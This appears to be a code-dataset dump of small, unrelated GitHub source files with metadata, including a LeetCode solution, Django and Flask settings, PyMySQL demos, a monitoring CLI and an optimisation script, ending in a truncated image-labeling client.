blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
318d451e5e9baa4b1d4cc02121cf2c36efd4eab3 | 959a7b17884aa9af1d38d9c6b0afe2045a9be5d2 | /Online Stock Span.py | 47a2706584a1006572a38de6b4dcb896fef431dd | [] | no_license | dumavit/leetcode | a1c998f4c56411b061995d939093b03f7aae366b | 866689f564125ca4152dc1b6b3d268991d7ec89a | refs/heads/master | 2022-02-07T20:44:17.388121 | 2022-01-31T21:02:28 | 2022-01-31T21:02:28 | 252,981,197 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | class StockSpanner:
    def __init__(self):
        # Monotonic stack of [price, span] pairs: prices are strictly
        # decreasing from bottom to top; span counts the days merged
        # into that entry by next().
        self.stack = []
def next(self, price):
res = 1
while self.stack and self.stack[-1][0] <= price:
res += self.stack.pop()[1]
self.stack.append([price, res])
return res
# Your StockSpanner object will be instantiated and called as such:
# obj = StockSpanner()
# param_1 = obj.next(price)
| [
"vitalii.duma@corva.ai"
] | vitalii.duma@corva.ai |
72400439926869248265447bf85cbabdb44fbf32 | 25b0e82ec0ba2b667e6ae429e59e19333a641723 | /Python/NPTEL/src/Week7/P10.py | 6a2578fdb3ed31ec6069f5236a04636495a1740f | [] | no_license | donkhan/msc | cf897a6dbfd72845074d13842351e49ebcf04557 | 73bc12fd3ad86e6915f51adc08af836dfdc52747 | refs/heads/master | 2021-07-10T06:43:52.687825 | 2020-11-09T06:54:14 | 2020-11-09T06:54:14 | 211,588,078 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 563 | py | def func():
    # Draws a star pattern on a 21-column grid: rows are centred on
    # column 10 and show stars in columns 10-i .. 10+i, widening for
    # i = 3..6 and then mirrored back down for i = 6..3.
    print()
    # NOTE(review): `c` is never used -- presumably the intended centre
    # column (10); confirm before removing.
    c = 10
    i = 3
    # Top half: rows grow wider as i increases.
    while i <= 6:
        j = 0
        while j <= 20:
            if j >= 10-i and j <= 10+i:
                print("*",end = " ")
            else:
                print(" ",end = " ")
            j = j + 1
        print("\n")
        i = i + 1
    # Bottom half: the same rows emitted in reverse order.
    i = 6
    while i >= 3:
        j = 0
        while j<= 20:
            if j >= 10 - i and j <= 10 + i:
                print("*", end=" ")
            else:
                print(" ", end=" ")
            j = j + 1
        print("\n")
        i = i - 1
# Module-level call: the pattern is printed when the script runs.
func()
| [
"donkhan"
] | donkhan |
a551061f954363fe867ae576ead48d3683dcf790 | 0f1bec24ebc7eab0a29ce433aef9ef937c91ebb7 | /commands/raxmon-monitoring-zones-traceroute | 1cc7f381fa91003d853fdb73e52ad896a86c003a | [] | no_license | bravelittlescientist/rackspace-monitoring-cli | d3f178cd1cb6e0b5675b6d2b46b0ecdaa9dcb210 | 600b08956e93fc8b61a095e4eaac45b7a637e8c1 | refs/heads/master | 2021-01-17T23:10:47.752809 | 2014-07-01T09:03:56 | 2014-07-01T09:03:56 | 21,474,623 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,677 | #!/usr/bin/env python
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pprint import pprint
try:
import simplejson as json
except ImportError:
import json
from raxmon_cli.common import run_action
from raxmon_cli.utils import str_to_dict, str_to_list
# Command-line option definitions consumed by raxmon_cli's run_action:
# each entry is [argument name list, argparse-style keyword dict].
OPTIONS = [
    [['--id'], {'dest': 'id', 'help': 'Monitoring zone id'}],
    [['--target'], {'dest': 'target', 'help': 'Target hostname or IP address'}],
    [['--target-resolver'], {'dest': 'target_resolver', 'help': 'Target resolver', 'default': 'IPv4'}]
]
# Options the user must supply on the command line.
REQUIRED_OPTIONS = ['id', 'target']
def callback(driver, options, args, callback):
    """Run a traceroute through the selected monitoring zone.

    Looks up the monitoring zone given by --id, traces the route to the
    --target host from it, and pretty-prints the raw API response.  The
    trailing `callback` parameter is part of the run_action calling
    convention and is unused here.
    """
    zone = driver.get_monitoring_zone(monitoring_zone_id=options.id)
    trace = driver.ex_traceroute(
        monitoring_zone=zone,
        target=options.target,
        target_resolver=options.target_resolver,
    )
    pprint(trace)
# Entry point: hand the option spec and callback() to raxmon_cli's
# run_action dispatcher for the 'monitoring_zones' / 'traceroute' command.
run_action(OPTIONS, REQUIRED_OPTIONS, 'monitoring_zones', 'traceroute',
           callback)
| [
"tomaz@tomaz.me"
] | tomaz@tomaz.me | |
841aba801d2d071d8dab9e4d3c0c83c024477335 | 09a8648805c390594be0908da3188f287dedc471 | /src/fundamental/accessMySQL.py | 3f65949cbc8cda3b336ba5d34b37f441ec62c19a | [
"Apache-2.0"
] | permissive | lgonline/mp | 9d17abbb41ff42fbaf1666059504e2377485c6a9 | 21ef1bfb2feacf6a7abda858c083e0c49878f889 | refs/heads/master | 2020-12-29T02:36:32.332387 | 2019-11-16T03:02:02 | 2019-11-16T03:02:02 | 44,308,720 | 1 | 1 | null | 2015-10-20T16:24:08 | 2015-10-15T09:50:46 | Python | UTF-8 | Python | false | false | 1,190 | py | __author__ = 'Administrator'
import os,sys
import pymysql
def sampleConnMysql():
    """Demo: print every row of the bm.userinfo table.

    Connection parameters are hard-coded (localhost, root/123456).  Unlike
    the original version, the connection and cursor are released even when
    a statement fails, and the actual error is reported instead of a
    fixed generic message.
    """
    conn = None
    try:
        conn = pymysql.connect(host='localhost', user='root', passwd='123456',
                               db='bm', port=3306, charset='utf8')
        cur = conn.cursor()
        try:
            cur.execute('select userid,name,password from userinfo')
            for userid, name, password in cur.fetchall():
                print("userid: " + str(userid) + ' name: ' + name +
                      " password: " + password)
        finally:
            cur.close()
    except Exception as exc:
        # Surface the underlying failure for debugging this demo.
        print("database access failed: %s" % exc)
    finally:
        if conn is not None:
            conn.close()
def connMySQLDemo():
    """Demo: rebuild the 'mpdb' database with a small users table and dump it.

    Drops any existing 'mpdb', recreates it, inserts four rows and prints
    them.  The cursor and connection are released even if a statement
    raises (the original leaked both on error), and the redundant inner
    ``import pymysql`` is removed -- the module already imports it.
    """
    conn = pymysql.Connection(host='127.0.0.1', user='root', passwd='123456')
    try:
        cur = conn.cursor()
        try:
            try:
                cur.execute("drop database mpdb")
            except Exception as e:
                # First run: the database does not exist yet -- report and go on.
                print(e)
            cur.execute("create database mpdb")
            cur.execute("use mpdb")
            cur.execute("create table users(id int,name varchar(8))")
            cur.execute("insert into users values(1,'www'),(2,'cnblogs'),(3,'com'),(4,'peter')")
            cur.execute('select * from users')
            for row in cur.fetchall():
                print(row)
        finally:
            cur.close()
        conn.commit()
    finally:
        conn.close()
if __name__ == '__main__':
pass | [
"lg_online@hotmail.com"
] | lg_online@hotmail.com |
44e1074a660ff7b36fd8603cd447819137ad3819 | ead9779110c2a0371ba3354b4bae4c5aa351424f | /project/project-template/project_name/woot/settings/staging.py | b6fed3aa53e84f0dc8406a81501e98ee93d19af0 | [] | no_license | NicholasPiano/django-skeleton-templates | 744ced68cd0efb3cf3b2c05cc447c25ffdbc2bfb | 3677ac05acd48fe14fc1292452b909c2ca7d4a85 | refs/heads/master | 2021-01-20T04:30:19.676492 | 2015-03-28T19:09:12 | 2015-03-28T19:09:12 | 25,471,712 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,710 | py | # {{project_name}}.settings.staging
# django
# local
from woot.settings.common import *
# util
from os import environ
########## DEBUG CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = True
# NOTE(review): DEBUG is enabled in a *staging* settings module -- confirm
# this is intentional before deploying.
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
TEMPLATE_DEBUG = DEBUG
########## END DEBUG CONFIGURATION
########## DATABASE CONFIGURATION
DATABASE_USER = environ.get('DB_USER')
DATABASE_PWD = environ.get('DB_PWD')
# NOTE(review): DATABASE_USER/DATABASE_PWD are read from the environment
# but never plugged into DATABASES below (USER/PASSWORD are empty) -- verify.
# mysql: https://github.com/PyMySQL/mysqlclient-python
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2' for PG
        'NAME': '',
        'USER': '',
        'PASSWORD': '',
        'HOST': '', # Set to empty string for localhost.
        'PORT': '', # Set to empty string for default.
    }
}
########## END DATABASE CONFIGURATION
########## CACHE CONFIGURATION
# Local memcached instance on the default port.
CACHES = {
    'default': {
        'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
        'LOCATION': '127.0.0.1:11211',
    }
}
########## END CACHE CONFIGURATION
########## SECRET CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Placeholder substituted when the project template is rendered.
SECRET_KEY = '{{ secret_key }}'
########## END SECRET CONFIGURATION
########## TOOLBAR CONFIGURATION
# See: https://github.com/django-debug-toolbar/django-debug-toolbar#installation
INSTALLED_APPS += (
    'debug_toolbar',
)
# See: https://github.com/django-debug-toolbar/django-debug-toolbar#installation
INTERNAL_IPS = ('127.0.0.1',)
# See: https://github.com/django-debug-toolbar/django-debug-toolbar#installation
MIDDLEWARE_CLASSES += (
    'debug_toolbar.middleware.DebugToolbarMiddleware',
)
DEBUG_TOOLBAR_CONFIG = {
}
########## END TOOLBAR CONFIGURATION
| [
"nicholas.d.piano@gmail.com"
] | nicholas.d.piano@gmail.com |
9033c26e3bd828fc81eef756c10dad8deec587df | 4cc22dad5cd0e05ea22f5aa1177e5a85fb6471ad | /gokart_pipeliner/pipeliner.py | efe905e6e831fd4237b6b801e771b0537b963537 | [
"MIT"
] | permissive | hirosassa/gokart-pipeliner | 2029544626bb17e207fdc3a19a238139a8c2617d | ec9aef9228e0de2363520974a266c069ddea0e37 | refs/heads/main | 2023-02-01T01:09:19.001282 | 2020-12-12T13:03:51 | 2020-12-12T13:03:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,157 | py | from typing import List
import luigi
import gokart
from gokart_pipeliner.instantiation_task import InstantiationTask
from gokart_pipeliner.enum import TYPING
from gokart_pipeliner.config_manager import ConfigManager
class GokartPipeliner:
    """Thin wrapper around gokart/luigi: builds a task pipeline from a
    list of task classes plus parameters and runs or inspects it locally."""
    def __init__(self,
                 params: TYPING.PARAMS = dict(),
                 config_path_list: TYPING.STR_LIST = list()):
        # NOTE(review): the dict()/list() defaults are shared across calls
        # if ConfigManager mutates its arguments -- confirm it copies them.
        self.config = ConfigManager(params, config_path_list)
    def run(self,
            tasks: List[luigi.task_register.Register],
            params: TYPING.PARAMS = dict()):
        """Instantiate the task chain and execute it on luigi's local scheduler."""
        params = self.config.make_running_params(params)
        task = InstantiationTask.run(tasks, params=params)
        luigi.build([task], local_scheduler=True)
    def print_dependence_tree(self,
                              tasks: List[luigi.task_register.Register],
                              params: TYPING.PARAMS = dict()):
        """Print the pipeline's dependency tree without executing it."""
        params = self.config.make_running_params(params)
        task = InstantiationTask.run(tasks, params=params)
        print("//-----[dependence_tree]------")
        print(gokart.info.make_tree_info(task))
        print("//----------------------------")
| [
"6syun9@gmail.com"
] | 6syun9@gmail.com |
e0b7ad7303a8e55c71905b535a4ea019af5c1c13 | 727a528cb2361ef7ea2043f66daa8dfc02f1d56e | /movies_project/movies/management/commands/remove_unused_movies.py | 2aa804936cdeb24280b884a72b9a80e6d94ec7c2 | [
"MIT"
] | permissive | TonyGu423/movies | a6e11fb7b4c1b2feb3bc928cace77b8f7ab6e79f | dbdb234119f88939ee485df69536bdbc091b8909 | refs/heads/master | 2021-01-16T20:43:36.121985 | 2015-10-26T12:24:00 | 2015-10-26T12:24:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 340 | py | from movies.models import Movie
from django.core.management.base import BaseCommand
class Command(BaseCommand):
    """Management command: delete Movie rows that no record references."""
    help = 'Removes unused movies'
    def handle(self, *args, **options):
        # Delete every movie with an empty `records` relation, echoing
        # each deleted title (Python 2 print statement).
        # NOTE(review): this issues one EXISTS query per movie -- consider
        # filtering in SQL if the table is large.
        for movie in Movie.objects.all():
            if not movie.records.exists():
                movie.delete()
                print movie.title
| [
"desecho@gmail.com"
] | desecho@gmail.com |
9f91e065dafd1449d8ae3bcc61105cccd7df254c | c41f97ac62188860534da88e7c809036857b1876 | /02-Code.py | 967d6c25ccf9d511d4796b3bca591b409288a54a | [] | no_license | ravi4all/AdvPython_March | 210280594bc4651583fc22ef7a6d45deecbce2fc | b6385d7f19025cdb1f061046603c66fdcfebc57a | refs/heads/master | 2020-04-29T07:59:04.193110 | 2019-03-23T12:41:38 | 2019-03-23T12:41:38 | 175,970,678 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 352 | py | class Student():
    # Class-level defaults; instances may shadow them (see s_1.standard).
    id = None
    name = None
    marks = None
    standard = 8
    # NOTE(review): `data` is a mutable CLASS attribute, shared by every
    # Student instance -- each showStudent() call appends to the same list.
    # If per-instance records are wanted, initialise it in __init__ instead.
    data = []
    def showStudent(self,id,name,marks):
        # Append one record to the shared list, then print the whole list.
        self.data.append([id,name,marks,self.standard])
        print(self.data)
# Demo: both instances append to the shared Student.data list, so the
# second showStudent() call prints both records.
s_1 = Student()
# Shadows the class attribute for this instance only.
s_1.standard = 9
s_1.showStudent(101,'Ram',78.6)
s_2 = Student()
s_2.showStudent(102,'Raman',86.5)
| [
"noreply@github.com"
] | ravi4all.noreply@github.com |
490864555c3152ac58cf916babb377112092e85c | 116acf603f5db8d626247355bf786c339ba95ea9 | /apps/inforguide/handler.py | 3a910bddbbc0ec0c4702466cf035bc334848fd3f | [] | no_license | dahunuaa/ZhihuiSMB_python3 | 0857afeec2337b44571986a9c70c26e716142ccb | 8db2708efccd5eefa393738500e326bd7fb65c21 | refs/heads/master | 2021-01-25T14:32:32.201879 | 2018-03-11T05:59:10 | 2018-03-11T05:59:10 | 123,703,184 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,324 | py | # -*- coding:utf-8 -*-
from ZhihuiSMB.apps.base.handler import MultiStandardHandler,SingleStandardHanler,TokenHandler
from ZhihuiSMB.libs.oauthlib import get_provider
from ZhihuiSMB.libs.loglib import get_logger
logger = get_logger("debug")
class InforguideListHandler(MultiStandardHandler,TokenHandler):
    """Collection endpoint: list (GET) and create (POST) inforguide records."""
    # Dotted path of the model this handler operates on.
    _model = "inforguide.InforguideModel"
    enable_methods = ["post","get"]
    # Presumably marks the endpoint as not requiring a private token
    # scope -- confirm against TokenHandler.
    private = False
class InforguideHandler(SingleStandardHanler,TokenHandler):
    """Single-record endpoint: fetch, update or delete one inforguide.

    NOTE(review): 'SingleStandardHanler' mirrors the (misspelled) name
    imported at the top of this module; renaming it requires changing
    the base module too.
    """
    _model = "inforguide.InforguideModel"
    enable_methods = ["get","put","delete"]
    private = False
class InforguideClassifyHandler(MultiStandardHandler,TokenHandler):
    """GET endpoint returning the classification breakdown of inforguides."""
    _model = "inforguide.InforguideModel"
    enable_methods = ["get"]
    private = False
    def get(self):
        # Delegate to the model's classify() and return it under "data".
        self.result["data"] = self.model.classify()
        self.finish(self.result)
class InforguideUpdateHandler(MultiStandardHandler,TokenHandler):
    """Maintenance endpoint triggering a model update.

    NOTE(review): the method is named `_get` while enable_methods lists
    "get", and its route is commented out in `handlers` below -- this
    endpoint appears deliberately disabled; confirm before re-enabling.
    """
    _model = "inforguide.InforguideModel"
    enable_methods = ["get"]
    private = False
    def _get(self):
        self.model.update()
# URL routing table: (path regex, handler class, oauth provider).
# Keep the catch-all "/(.*)" entry last so it does not shadow the more
# specific routes (assuming first-match routing -- confirm).
handlers = [
    (r"",InforguideListHandler,get_provider("inforguide")),
    (r"/classify",InforguideClassifyHandler,get_provider("inforguide")),
    # (r"/update",InforguideUpdateHandler,get_provider("inforguide")),
    (r"/(.*)",InforguideHandler,get_provider("inforguide"))
]
| [
"dahu yao"
] | dahu yao |
8544d26a3c301bbbd0ba99500ab5335cb78b23ce | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02382/s791282888.py | a561149827dff37dff5d772184eb82b93aeb25a2 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 604 | py | #! python 3
# distance_ii.py
import math
def minkovski(a, b, p):
    """Return the Minkowski distance of order ``p`` between vectors a and b.

    ``p`` is a positive number, or the string 'inf' for the Chebyshev
    (L-infinity) distance, i.e. the largest absolute coordinate difference.
    Coordinates are paired with zip(), so both branches consistently use
    min(len(a), len(b)) pairs (the original indexed `a`'s length directly
    in the 'inf' branch).
    """
    diffs = [abs(x - y) for x, y in zip(a, b)]
    if p == 'inf':
        # L-infinity norm: built-in max() replaces the manual scan loop.
        return max(diffs)
    # General case: (sum |x-y|^p)^(1/p).
    return pow(sum(pow(d, p) for d in diffs), 1 / p)
# Driver: read the vector length, the two integer vectors, then print
# the distances for p = 1, 2, 3 and infinity with six decimals.
# NOTE(review): `n` is read but never validated against len(a)/len(b).
n = int(input())
a = [int(x) for x in input().split(' ')]
b = [int(x) for x in input().split(' ')]
for p in [1, 2, 3, 'inf']:
    print('%.6f'%minkovski(a, b, p))
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
abfea447ccb5dcc8cb7ef7aa9371f594739c1616 | 29f8b7f92eb22cc3134a16c439d3180e254df4bb | /chp12_flasktaskr_part05/project/__init__.py | d30a310dfbec437928b7a6cfbcc4ed4aac395547 | [] | no_license | Hemie143/realpython2 | 7df80dd5f61ce7cd8c31b8bf78111b8507cbdb36 | b8535ffe97594e1b18233bcd9aa0de664257cb09 | refs/heads/master | 2022-12-12T04:51:53.120131 | 2021-01-03T19:52:32 | 2021-01-03T19:52:32 | 208,735,855 | 0 | 0 | null | 2023-08-17T05:45:32 | 2019-09-16T07:22:16 | Python | UTF-8 | Python | false | false | 494 | py | # project/__init__.py
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config.from_pyfile('_config.py')
db = SQLAlchemy(app)
from chp12_flasktaskr_part05.project.users.views import users_blueprint
from chp12_flasktaskr_part05.project.tasks.views import tasks_blueprint
# from project.users.views import users_blueprint
# from project.tasks.views import tasks_blueprint
app.register_blueprint(users_blueprint)
app.register_blueprint(tasks_blueprint)
| [
"hemie143@gmail.com"
] | hemie143@gmail.com |
0928fa1442304f1c65bdf6a271a83d62dfef9e80 | dca0bd2e04dda3801d395c2a6ab2f9d95be79551 | /Python/SmallProject/three_stooges.py | 63eb8eccae942e5a7de0c7bd84bf4411c7b65899 | [] | no_license | A-khateeb/Full-Stack-Development-Path | ab8c86abea2f983fb8e0046a65b99772416c754c | 5a5eaa198367cc95a6b5638e9740f4ad564dec23 | refs/heads/master | 2021-06-01T23:52:04.965494 | 2020-05-01T22:59:20 | 2020-05-01T22:59:20 | 89,286,943 | 2 | 0 | null | 2017-12-22T22:21:52 | 2017-04-24T21:04:07 | Shell | UTF-8 | Python | false | false | 445 | py |
p = 'Hello world'
Stooges = ['Moe', 'Larry', 'Curly']
print (Stooges)
Stooges[2] = 'Shemp'
print (Stooges)
q= Stooges
q[2]= "!"
print (q)
print (Stooges)
Stooges.append('Shemp22')
print(Stooges)
print (len(['a',['b',["c"]]]))
print (len([0,1]))
print (len(["Udacity"]))
list1= [1,2]
list2 =[3,4]
list1.append(list2)
print (len(list1))
list2[1] = 5
print (list1)
'''
spy= [0,0,7]
agent = spy
spy[2]= agent[2]+1
print (spy)
print (agent)
'''
| [
"khateebafeef@gmail.com"
] | khateebafeef@gmail.com |
9902394669267c37d5bd08bb34edc9919258b642 | 48e6a442f35cace8df3a87e1660e4539a084b39e | /cluster_2/90_10/A1_pod100/traffic_matrix_1/A1_1.py | ff9e5eb1a6848b9195753f8fd17b0ca8dfe69ad7 | [] | no_license | LiYan1988/kthjocn | 9056c05e5095a93b47a22c9e027458f410c0d8f3 | 7e5de3b3fb2a48c6dcaf6d7788ab823c5c743845 | refs/heads/master | 2021-01-01T03:56:47.251908 | 2018-06-08T07:27:33 | 2018-06-08T07:27:33 | 77,261,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,740 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Aug 4 15:15:10 2016
@author: li
optimize both throughput and connections
"""
#import sys
#sys.path.insert(0, '/home/li/Dropbox/KTH/numerical_analysis/ILPs')
from sdm import *
from gurobipy import *
import pandas as pd
np.random.seed(2010)
num_cores=5
num_slots=80
mtridx = 1
time_limit_routing = 1800 # 1000
time_limit_sa = 108 # 10800
filename = 'traffic_matrix_1.csv'
# print filename
tm = []
with open(filename) as f:
reader = csv.reader(f)
for idx, row in enumerate(reader):
row = [float(u) for u in row]
tm.append(row)
tm = np.array(tm)
betav = np.array([0,
1e-5, 2e-5, 4e-5, 8e-5,
1e-4, 2e-4, 4e-4, 8e-4,
1e-3, 2e-3, 4e-3, 8e-3,
1e-2, 2e-2, 4e-2, 8e-2,
1e-1, 2e-1, 4e-1, 1, 10])
#betav = np.array([1e-3, 2e-3, 4e-3, 8e-3])
results = {}
obj_results = {}
cnk_results = {}
thp_results = {}
obj_ub = {}
cnk_ub = {}
thp_ub = {}
for beta in betav:
m = Arch1_decompose(tm, num_slots=num_slots, num_cores=num_cores,
alpha=1,beta=beta)
m.create_model_routing(mipfocus=1,timelimit=time_limit_routing,mipgap=0.05, method=2)
m.multiple_heuristic()
results[beta] = pd.DataFrame(m.heuristics_results)
obj_results[beta] = results[beta].iloc[0, :]
cnk_results[beta] = results[beta].iloc[1, :]
thp_results[beta] = results[beta].iloc[2, :]
obj_ub[beta] = m.obj_ub_
cnk_ub[beta] = m.connection_ub_
thp_ub[beta] = m.throughput_ub_
# write results
m.write_result_csv('cnklist_heuristic_%d_%.2e.csv'%(mtridx,beta), m.cnklist_)
obj_results = pd.DataFrame(obj_results)
cnk_results = pd.DataFrame(cnk_results)
thp_results = pd.DataFrame(thp_results)
obj_ub = pd.Series(obj_ub)
cnk_ub = pd.Series(cnk_ub)
thp_ub = pd.Series(thp_ub)
argmax = {betav[i]:obj_results.iloc[:, i].argmax() for i in range(len(betav))}
objmax = {betav[i]:obj_results.iloc[:, i].max() for i in range(len(betav))}
cnk_bh = {betav[i]:cnk_results.loc[argmax[betav[i]], betav[i]]
for i in range(len(betav))}
thp_bh = {betav[i]:thp_results.loc[argmax[betav[i]], betav[i]]
for i in range(len(betav))}
obj_final = pd.DataFrame({'ub':obj_ub, 'best_heuristic':objmax,
'best_method':argmax, 'cnk_bh':cnk_bh,
'thp_bh':thp_bh, 'cnk_ub':cnk_ub, 'thp_ub':thp_ub})
obj_final['optimality'] = obj_final['best_heuristic']/obj_final['ub']
obj_results.to_csv('obj_results_{}.csv'.format(mtridx))
cnk_results.to_csv('cnk_results_{}.csv'.format(mtridx))
thp_results.to_csv('thp_results_{}.csv'.format(mtridx))
obj_final.to_csv('obj_final_{}.csv'.format(mtridx)) | [
"li.yan.ly414@gmail.com"
] | li.yan.ly414@gmail.com |
fe051cda5eea45aaa1903b017a8c2a6d1ee5e14c | d5ee6e6bd1df32a123558e6e4a79c3ad17db19bc | /news/managers.py | 0c53ab2888fd1d4280c4654b067893967f34b36b | [] | no_license | trailhawks/lawrencetrailhawks.com | 06d9f3f0753f0529718a14540858637b5bdfae3d | b250c131cd655e9b43b27834db702e3a853df88b | refs/heads/master | 2021-06-10T11:22:20.435575 | 2016-12-23T08:58:08 | 2016-12-23T08:58:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 794 | py | import datetime
from django.db.models import Manager
from django.db.models.query import QuerySet
from django.utils import timezone
class NewsQuerySet(QuerySet):
    """Chainable status/recency filters for News objects."""
    def draft(self):
        # Only items still in draft status.
        return self.filter(status__exact=self.model.STATUS_DRAFT)
    def public(self):
        # Only published items.
        return self.filter(status__exact=self.model.STATUS_PUBLIC)
    def recent(self):
        # Items published within the last two weeks.
        recently = timezone.now() - datetime.timedelta(days=14)
        return self.filter(pub_date__gte=recently)
class NewsManager(Manager):
    """Manager exposing the NewsQuerySet filters directly on the model."""
    def get_queryset(self):
        # Route all manager queries through the custom queryset class.
        return NewsQuerySet(self.model, using=self._db)
    def draft(self):
        return self.get_queryset().draft()
    def public(self):
        return self.get_queryset().public()
    def recent(self):
        return self.get_queryset().recent()
| [
"jeff.triplett@gmail.com"
] | jeff.triplett@gmail.com |
0e4a2e05b6a37082a2b8121508a8530e3042edee | 0be484378e45f67a8ab7675498cbc80b51df8461 | /bt5/erp5_ui_test_core/SkinTemplateItem/portal_skins/erp5_ui_test_core/Zuite_setPreference.py | 1eb1be5e08970ec882a4fcc3af5d6feaed8d8519 | [] | no_license | uhml/erp5 | 7ba69b43d0f6c36e4e1b1116351788e75135889d | 41bae8338b238267d60e57a7c7aaa91b32ee0826 | refs/heads/master | 2021-01-14T13:21:27.340016 | 2016-08-18T10:10:56 | 2016-08-18T11:12:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,306 | py | """Set subversion working copy list and enable preference.
This script is called by Products.ERP5Type.tests.runFunctionalTest to set
subversion working copy paths and conversion server address.
It's not meant to be called by zelenium tests directly.
"""
pref = getattr(context.portal_preferences, "erp5_ui_test_preference", None)
if pref is None:
pref = context.portal_preferences.newContent(id="erp5_ui_test_preference",
portal_type="Preference",
priority=1)
pref.setPreferredSubversionWorkingCopyList(tuple(working_copy_list.split(',')))
pref.setPreferredHtmlStyleUnsavedFormWarning(False)
if pref.getPreferenceState() == 'disabled':
pref.enable()
pref = getattr(context.portal_preferences, "erp5_ui_test_system_preference", None)
if pref is None:
pref = context.portal_preferences.newContent(id="erp5_ui_test_system_preference",
portal_type="System Preference",
priority=1)
pref.setPreferredOoodocServerAddress(conversion_server_hostname)
pref.setPreferredOoodocServerPortNumber(conversion_server_port)
if pref.getPreferenceState() == 'disabled':
pref.enable()
return 'Set Preference Successfully.'
| [
"georgios.dagkakis@nexedi.com"
] | georgios.dagkakis@nexedi.com |
1460e4adc0eaf45d2f00362cbf7115fb97d33bd3 | 507b4ffbdc19614603da9c5c6ea31910fdbbf288 | /interface/labeler_client.py | c5c2eab0889b1d1660528d177857cd573207b2fd | [
"Apache-2.0"
] | permissive | jerryli27/TwinGANFrontendTemporary | 755a0e39f6f92522687cd1bd916549acd2295fd0 | 24f9327d1c50f7b54198a8d74073ca7507d715fb | refs/heads/master | 2020-03-14T12:22:12.950810 | 2018-04-30T15:14:14 | 2018-04-30T15:14:14 | 131,610,369 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,788 | py | import os
import util_io
import util_misc
import interface_utils
class LabelerClient(object):
  """Serves colored images with matching sketches to a labeling UI and
  records which images have been handled."""
  def __init__(self,):
    # Parallel lists: image_paths[i] pairs with sketch_paths[i]
    # (sketch entries are filled lazily by get_image_and_id()).
    self.image_paths = []
    self.sketch_paths = []
    # Index of the image currently being served.
    self.index = 0
    # Paths already labeled or skipped, persisted in done_image_txt_path.
    self.done_image_paths = set()
    self.done_image_txt_path = ''
    self.sketch_folder = ''
  def set_image_paths(self, image_path, finished_image_txt_path, sketch_folder, exclude_file_start={'e', 'q'}):
    """Load the image list, the progress file and the sketch folder.

    Images whose basename starts with a character in `exclude_file_start`
    are dropped, and only images with a same-named sketch in
    `sketch_folder` are kept.  NOTE(review): the mutable default for
    `exclude_file_start` is never mutated here, so it is harmless.
    """
    if image_path:
      self.image_paths = util_io.get_all_image_paths(image_path)
      # Danbooru specific method to filter out nsfw images.
      self.image_paths = [p for p in self.image_paths if os.path.basename(p)[0] not in exclude_file_start]
      self.sketch_paths = [None for _ in range(len(self.image_paths))]
      self.index = 0
    if finished_image_txt_path:
      self.done_image_txt_path = finished_image_txt_path
      dir = os.path.dirname(finished_image_txt_path)
      self.colored_sketch_pair_txt_path = os.path.join(dir, 'colored_sketch_pair.txt')
      util_io.touch_folder(dir)
      try:
        # AssertionError presumably means the progress file does not
        # exist yet -- confirm against util_io.get_all_image_paths.
